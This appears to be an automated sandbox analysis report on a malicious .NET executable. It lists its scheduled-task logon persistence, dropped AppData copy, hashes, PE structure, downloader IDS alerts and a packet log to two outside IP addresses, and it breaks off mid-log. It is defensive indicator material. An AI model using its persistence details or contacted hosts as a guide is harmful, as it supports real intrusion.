                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                              C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):823296
                                                                              Entropy (8bit):7.692389203049491
                                                                              Encrypted:false
                                                                              SSDEEP:12288:71ZF8K83T5BC9eA/7/GoC40zUi9d3hSvn6Q/tOz2L3pIzp/+TZwFIFIuh:7yZk7e40BdMf6eT+F/0Iuh
                                                                              MD5:4CF3E3AD3BBFAF2B2950F501466FEFB7
                                                                              SHA1:32A330BD302D266D201621AFA6B624A8E3AA6E04
                                                                              SHA-256:953B66B361820B31E028C6EAE7F14A8B57CA6DD231BAAE5045ABBAF7455AB6F3
                                                                              SHA-512:3D1C203C4A4B152DD93A975758CC49821FF7106CEF3D26A3F766AC4E36011CC4078CB28F706591B01142282092CEA966F38ED46DD8432F5D3035E4A812CF0DD0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.................0.............^.... ........@.. ....................................@.....................................O.......,............................d..p............................................ ............... ..H............text...d.... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B................?.......H.......h...(.......(....;...(...........................................0..5........r...p(.....rk..p(.....r...p..A.....A...(.........+D...Y..r...p..A.....A...(......{....o.....o...............,.+......X...{..........-.........,......8.........(......X..r...p...A......A...(......r...p..(....(........{.....Y.........,..r...p(.....81............8.....r...p...A......A...(.......{....o......o......r9..p..(....(.......,...o.....(....+......,(.r[..p...........o....r...p(....(.....+

                                                                              C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\2i3Lj7a8Gk.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.692389203049491
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              File name:2i3Lj7a8Gk.exe
                                                                              File size:823'296 bytes
                                                                              MD5:4cf3e3ad3bbfaf2b2950f501466fefb7
                                                                              SHA1:32a330bd302d266d201621afa6b624a8e3aa6e04
                                                                              SHA256:953b66b361820b31e028c6eae7f14a8b57ca6dd231baae5045abbaf7455ab6f3
                                                                              SHA512:3d1c203c4a4b152dd93a975758cc49821ff7106cef3d26a3f766ac4e36011cc4078cb28f706591b01142282092cea966f38ed46dd8432f5d3035e4a812cf0dd0
                                                                              SSDEEP:12288:71ZF8K83T5BC9eA/7/GoC40zUi9d3hSvn6Q/tOz2L3pIzp/+TZwFIFIuh:7yZk7e40BdMf6eT+F/0Iuh
                                                                              TLSH:4705DFC03B29B319DEB95A74D439DDB452B42D687010FAE62EDD3B97786D3109E08F82
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.................0.............^.... ........@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:90cececece8e8eb0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4ca35e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0xD4D79B6B [Fri Feb 26 20:36:59 2083 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xca30b0x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xcc0000x62c.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xc64180x70.text
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000xc83640xc8400e8ffefdc168929f4df2e35e89d95e174False0.8655672109082397data7.700449083739961IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xcc0000x62c0x80089024a8bedb563b57cab816160555b46False0.33935546875data3.4785637475731908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0xce0000xc0x20036fa7ca219101abbbc504cf758322793False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0xcc0900x39cdata0.41883116883116883
                                                                              RT_MANIFEST0xcc43c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-07T08:51:19.642490+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733132.226.247.7380TCP
                                                                              2024-10-07T08:51:20.903264+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449733132.226.247.7380TCP
                                                                              2024-10-07T08:51:21.294932+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449736188.114.96.3443TCP
                                                                              2024-10-07T08:51:22.095609+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737132.226.247.7380TCP
                                                                              2024-10-07T08:51:23.986288+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.247.7380TCP
                                                                              2024-10-07T08:51:24.110935+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449742188.114.96.3443TCP
                                                                              2024-10-07T08:51:24.876852+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.247.7380TCP
                                                                              2024-10-07T08:51:25.444864+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.96.3443TCP
                                                                              2024-10-07T08:51:26.173750+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449748132.226.247.7380TCP
                                                                              2024-10-07T08:51:26.714920+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449750188.114.96.3443TCP
                                                                              2024-10-07T08:51:27.439405+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449752132.226.247.7380TCP
                                                                              2024-10-07T08:51:27.946696+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449753188.114.96.3443TCP
                                                                              2024-10-07T08:51:29.222035+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449757188.114.96.3443TCP
                                                                              2024-10-07T08:51:29.280345+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449758188.114.96.3443TCP
                                                                              2024-10-07T08:51:30.604522+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449762188.114.96.3443TCP
                                                                              2024-10-07T08:51:31.916052+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449765188.114.96.3443TCP
                                                                              2024-10-07T08:51:33.222156+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449769188.114.96.3443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 7, 2024 08:51:18.693779945 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:18.698798895 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:18.698890924 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:18.699125051 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:18.703912973 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:19.363337994 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:19.387669086 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:19.392538071 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:19.601515055 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:19.642489910 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:19.684942007 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:19.684983969 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:19.685081959 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:19.695425987 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:19.695460081 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.179563999 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.179699898 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.207051039 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.207092047 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.207474947 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.251856089 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.353480101 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.395400047 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.465012074 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.465111971 CEST44349734188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.465279102 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.471419096 CEST49734443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.480240107 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:20.485002995 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:20.684520006 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:20.686865091 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.686892986 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.686976910 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.687289953 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:20.687300920 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:20.903207064 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:20.903264046 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.152023077 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:21.155421019 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.155431986 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:21.294924974 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:21.295012951 CEST44349736188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:21.295097113 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.295620918 CEST49736443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.298685074 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.302303076 CEST4973780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.303864002 CEST8049733132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:21.303917885 CEST4973380192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.307224989 CEST8049737132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:21.307426929 CEST4973780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.307543993 CEST4973780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:21.312313080 CEST8049737132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:21.989424944 CEST8049737132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:21.990865946 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.990891933 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:21.991166115 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.991414070 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:21.991425991 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:22.095608950 CEST4973780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:22.460617065 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:22.465301991 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:22.465316057 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:22.775279045 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:22.775573015 CEST44349739188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:22.775628090 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:22.775923014 CEST49739443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:22.780200958 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:22.785013914 CEST8049740132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:22.785089970 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:22.785193920 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:22.789988995 CEST8049740132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.051723957 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.056520939 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.056652069 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.057079077 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.061805964 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.468280077 CEST8049740132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.469368935 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.469403028 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:23.469456911 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.470021963 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.470026970 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:23.517473936 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.730097055 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.733705044 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.738574982 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.939752102 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:23.977214098 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:23.978785038 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.978811979 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:23.984726906 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.984760046 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:23.985054016 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.986288071 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:23.990106106 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:23.990118027 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.110909939 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.111000061 CEST44349742188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.111043930 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.111605883 CEST49742443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.116436005 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.117566109 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.121475935 CEST8049740132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.121535063 CEST4974080192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.122380018 CEST8049744132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.122443914 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.122538090 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.127289057 CEST8049744132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.455715895 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.455826998 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.457516909 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.457523108 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.458472967 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.501871109 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.513438940 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.555397987 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.621068954 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.621181011 CEST44349743188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.623754978 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.623754978 CEST49743443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.627157927 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.631908894 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.809830904 CEST8049744132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.811073065 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.811132908 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.811351061 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.811861038 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.811891079 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.833192110 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:24.835555077 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.835594893 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.835671902 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.836000919 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:24.836020947 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:24.861234903 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:24.876852036 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.269382954 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.270994902 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.271037102 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.296331882 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.298053026 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.298091888 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.417274952 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.417378902 CEST44349745188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.417438030 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.417990923 CEST49745443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.422146082 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.422883987 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.427130938 CEST8049744132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:25.427195072 CEST4974480192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.427660942 CEST8049747132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:25.427735090 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.427826881 CEST4974780192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.432552099 CEST8049747132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:25.444931984 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.445171118 CEST44349746188.114.96.3192.168.2.4
                                                                              Oct 7, 2024 08:51:25.445246935 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.445710897 CEST49746443192.168.2.4188.114.96.3
                                                                              Oct 7, 2024 08:51:25.449469090 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.450378895 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.454555035 CEST8049741132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:25.454621077 CEST4974180192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.455204010 CEST8049748132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:25.455271959 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.465378046 CEST4974880192.168.2.4132.226.247.73
                                                                              Oct 7, 2024 08:51:25.470216990 CEST8049748132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.099988937 CEST8049747132.226.247.73192.168.2.4
                                                                              Oct 7, 2024 08:51:26.101627111 CEST49749443192.168.2.4188.114.96.3
